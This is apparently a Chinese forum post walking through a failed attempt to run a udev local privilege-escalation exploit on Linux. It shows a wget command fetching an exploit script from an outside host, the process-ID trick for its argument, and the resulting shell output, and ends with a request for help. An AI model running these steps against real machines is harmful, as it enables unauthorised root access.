1.下载攻击脚本
[test@H0f ~]$ wget http://www.extmail .org/source/exploit-udev-8478
--2018-04-02 01:21:00-- http://www.extmail/
Resolving www.extmail... failed: Name or service not known.
wget: unable to resolve host address “www.extmail”
--2018-04-02 01:21:00-- http://.org/source/exploit-udev-8478
Resolving .org... failed: Name or service not known.
wget: unable to resolve host address “.org”
[test@H0f ~]$ wget http://www.extmail.org/source/exploit-udev-8478
--2018-04-02 01:21:14-- http://www.extmail.org/source/exploit-udev-8478
Resolving www.extmail.org... 124.172.184.131
Connecting to www.extmail.org|124.172.184.131|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3367 (3.3K) [application/octet-stream]
Saving to: “exploit-udev-8478”
100%[===============================================================================>
2018-04-02 01:21:15 (351 KB/s) - “exploit-udev-8478” saved [3367/3367]
2.获得udev进程号
[test@H0f ~]$ ps ax|grep udev|grep -v grep|awk {'print $1'} 581 2508 2509
3.获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,执行脚本
[test@H0f ~]$ sh exploit-udev-8478 580 suid.c: In function ‘main’: suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
4.输入id进行验证
1 sh-4.1$ id 2 uid=502(test) gid=502(test) groups=502(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
多次实验仍未成功,大佬看到求指点,应该是我的linux版本问题把